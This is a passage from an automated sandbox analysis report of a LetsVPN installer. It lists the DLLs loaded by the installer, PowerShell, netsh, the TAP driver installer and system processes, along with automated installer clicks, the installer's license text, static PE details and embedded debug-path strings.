              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: userenv.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: propsys.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: dwmapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: oleacc.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntmarta.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: version.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: shfolder.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wldp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: profapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: riched20.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: usp10.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: msls31.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textinputframework.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coreuicomponents.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coremessaging.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textshaping.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: linkinfo.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntshrui.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cscapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devrtl.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: spinf.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: newdev.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cabinet.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpnpmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupengine.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: implatsetup.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: spinf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Users\user\Desktop\letsVPN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\mmc.exeWindow found: window name: msctls_updown32Jump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeAutomated click: Next >
              Source: C:\ProgramData\letsvpn-latest.exeAutomated click: I Agree
              Source: C:\ProgramData\letsvpn-latest.exeAutomated click: Install
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\ProgramData\letsvpn-latest.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: letsVPN.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: letsVPN.exeStatic file information: File size 33128448 > 1048576
              Source: letsVPN.exeStatic PE information: section name: RT_CURSOR
              Source: letsVPN.exeStatic PE information: section name: RT_BITMAP
              Source: letsVPN.exeStatic PE information: section name: RT_ICON
              Source: letsVPN.exeStatic PE information: section name: RT_MENU
              Source: letsVPN.exeStatic PE information: section name: RT_DIALOG
              Source: letsVPN.exeStatic PE information: section name: RT_STRING
              Source: letsVPN.exeStatic PE information: section name: RT_ACCELERATOR
              Source: letsVPN.exeStatic PE information: section name: RT_GROUP_ICON
              Source: letsVPN.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1ecc400
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dlll source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374330113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377335396.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377822909.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2378990816.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2449650568.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000013.00000003.2419235971.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000013.00000003.2442323739.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2423303491.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.00000000005A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000013.00000003.2440630765.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3962172834.000000005E4F2000.00000002.00000800.01000000.00000037.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2452801901.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000013.00000003.2432933736.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: letsvpn-latest.exe, 00000013.00000003.2504301435.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: letsvpn-latest.exe, 00000013.00000003.2437822985.0000000002834000.00000004.00000020.00020000.00000000.sdmp
